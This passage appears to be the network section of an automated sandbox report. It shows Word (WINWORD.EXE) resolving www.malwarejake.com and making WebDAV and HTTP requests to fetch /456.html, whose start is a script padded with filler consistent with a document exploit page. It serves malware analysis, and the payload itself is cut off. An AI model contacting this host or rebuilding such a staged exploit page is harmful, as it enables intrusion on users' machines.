Aug 18, 2022 08:27:17.008132935 CEST | 53 | 54723 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:17.010565996 CEST | 58062 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:17.033431053 CEST | 53 | 58062 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:18.789341927 CEST | 56703 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:18.808767080 CEST | 53 | 56703 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:18.810611010 CEST | 59241 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:18.829739094 CEST | 53 | 59241 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:20.532392979 CEST | 55244 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:20.549607992 CEST | 53 | 55244 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:20.552045107 CEST | 53958 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:20.575946093 CEST | 53 | 53958 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:23.934649944 CEST | 56020 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:23.951637030 CEST | 53 | 56020 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:23.955573082 CEST | 51663 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:23.980344057 CEST | 53 | 51663 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:25.661467075 CEST | 51020 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:25.680829048 CEST | 53 | 51020 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:25.695321083 CEST | 60622 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:25.719031096 CEST | 53 | 60622 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:27.480531931 CEST | 53160 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:27.516104937 CEST | 53 | 53160 | 8.8.8.8 | 192.168.2.22
Aug 18, 2022 08:27:27.519289970 CEST | 64948 | 53 | 192.168.2.22 | 8.8.8.8
Aug 18, 2022 08:27:27.538095951 CEST | 53 | 64948 | 8.8.8.8 | 192.168.2.22
DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 18, 2022 08:27:05.044718027 CEST | 192.168.2.22 | 8.8.8.8 | 0x868f | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:11.726632118 CEST | 192.168.2.22 | 8.8.8.8 | 0xd966 | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:11.759929895 CEST | 192.168.2.22 | 8.8.8.8 | 0x1b3e | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:16.983206034 CEST | 192.168.2.22 | 8.8.8.8 | 0xf2ca | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:17.010565996 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:18.789341927 CEST | 192.168.2.22 | 8.8.8.8 | 0x646c | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:18.810611010 CEST | 192.168.2.22 | 8.8.8.8 | 0x12f1 | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:20.532392979 CEST | 192.168.2.22 | 8.8.8.8 | 0xe6e0 | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:20.552045107 CEST | 192.168.2.22 | 8.8.8.8 | 0x6703 | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:23.934649944 CEST | 192.168.2.22 | 8.8.8.8 | 0xc8dd | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:23.955573082 CEST | 192.168.2.22 | 8.8.8.8 | 0xe95b | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:25.661467075 CEST | 192.168.2.22 | 8.8.8.8 | 0x7820 | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:25.695321083 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c87 | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:27.480531931 CEST | 192.168.2.22 | 8.8.8.8 | 0x4c7a | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:27.519289970 CEST | 192.168.2.22 | 8.8.8.8 | 0x288a | Standard query (0) | www.malwarejake.com | A (IP address) | IN (0x0001)
DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 18, 2022 08:27:05.067305088 CEST | 8.8.8.8 | 192.168.2.22 | 0x868f | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:11.754184961 CEST | 8.8.8.8 | 192.168.2.22 | 0xd966 | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:11.776880980 CEST | 8.8.8.8 | 192.168.2.22 | 0x1b3e | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:17.008132935 CEST | 8.8.8.8 | 192.168.2.22 | 0xf2ca | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:17.033431053 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:18.808767080 CEST | 8.8.8.8 | 192.168.2.22 | 0x646c | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:18.829739094 CEST | 8.8.8.8 | 192.168.2.22 | 0x12f1 | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:20.549607992 CEST | 8.8.8.8 | 192.168.2.22 | 0xe6e0 | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:20.575946093 CEST | 8.8.8.8 | 192.168.2.22 | 0x6703 | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:23.951637030 CEST | 8.8.8.8 | 192.168.2.22 | 0xc8dd | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:23.980344057 CEST | 8.8.8.8 | 192.168.2.22 | 0xe95b | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:25.680829048 CEST | 8.8.8.8 | 192.168.2.22 | 0x7820 | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:25.719031096 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c87 | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:27.516104937 CEST | 8.8.8.8 | 192.168.2.22 | 0x4c7a | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
Aug 18, 2022 08:27:27.538095951 CEST | 8.8.8.8 | 192.168.2.22 | 0x288a | No error (0) | www.malwarejake.com | | 143.198.109.79 | A (IP address) | IN (0x0001)
      • www.malwarejake.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49178 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:05 UTC | 0 | OUT | OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: www.malwarejake.com
Content-Length: 0
Connection: Keep-Alive
2022-08-18 06:27:05 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49179 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:12 UTC | 0 | OUT | HEAD /456.html HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
2022-08-18 06:27:12 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.22 | 49188 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:27 UTC | 11 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
Data Ascii:
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: www.malwarejake.com
2022-08-18 06:27:28 UTC | 11 | IN | HTTP/1.1 405 Method Not Allowed
Date: Thu, 18 Aug 2022 06:27:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1
2022-08-18 06:27:28 UTC | 12 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
Data Ascii:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PROPFIND is not allowed for this URL.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server a


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.22 | 49189 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:28 UTC | 12 | OUT | GET /456.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www.malwarejake.com
If-Modified-Since: Tue, 31 May 2022 01:57:49 GMT
If-None-Match: "1b90-5e045198f8aaa"
Connection: Keep-Alive
2022-08-18 06:27:28 UTC | 12 | IN | HTTP/1.1 304 Not Modified
Date: Thu, 18 Aug 2022 06:27:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Connection: close
ETag: "1b90-5e045198f8aaa"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.22 | 49190 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:29 UTC | 13 | OUT | HEAD /456.html HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Content-Length: 0
Connection: Keep-Alive
2022-08-18 06:27:29 UTC | 13 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.22 | 49191 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:30 UTC | 13 | OUT | HEAD /456.html HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Content-Length: 0
Connection: Keep-Alive
2022-08-18 06:27:30 UTC | 13 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49180 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:17 UTC | 0 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: www.malwarejake.com
2022-08-18 06:27:17 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49181 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:19 UTC | 1 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
Data Ascii:
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: www.malwarejake.com
2022-08-18 06:27:19 UTC | 1 | IN | HTTP/1.1 405 Method Not Allowed
Date: Thu, 18 Aug 2022 06:27:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1
2022-08-18 06:27:19 UTC | 1 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
Data Ascii:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PROPFIND is not allowed for this URL.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server a


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49182 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:20 UTC | 1 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
Data Ascii:
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: www.malwarejake.com
2022-08-18 06:27:21 UTC | 1 | IN | HTTP/1.1 405 Method Not Allowed
Date: Thu, 18 Aug 2022 06:27:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1
2022-08-18 06:27:21 UTC | 2 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61
Data Ascii:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PROPFIND is not allowed for this URL.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server a


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49183 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:21 UTC | 2 | OUT | GET /456.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www.malwarejake.com
Connection: Keep-Alive
2022-08-18 06:27:22 UTC | 2 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
2022-08-18 06:27:22 UTC | 2 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii:
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.22 | 49184 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:22 UTC | 9 | OUT | HEAD /456.html HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Content-Length: 0
Connection: Keep-Alive
2022-08-18 06:27:22 UTC | 10 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.22 | 49185 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:23 UTC | 10 | OUT | HEAD /456.html HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
Content-Length: 0
Connection: Keep-Alive
2022-08-18 06:27:23 UTC | 10 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.22 | 49186 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:24 UTC | 10 | OUT | HEAD /456.html HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: www.malwarejake.com
2022-08-18 06:27:24 UTC | 10 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Aug 2022 06:27:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 31 May 2022 01:57:49 GMT
ETag: "1b90-5e045198f8aaa"
Accept-Ranges: bytes
Content-Length: 7056
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.22 | 49187 | 143.198.109.79 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 06:27:26 UTC | 11 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 6d 61 6c 77 61 72 65 6a 61 6b 65 2e 63 6f 6d 0d 0a 0d 0a
Data Ascii:
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: www.malwarejake.com
2022-08-18 06:27:26 UTC | 11 | IN | HTTP/1.1 405 Method Not Allowed
Date: Thu, 18 Aug 2022 06:27:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1
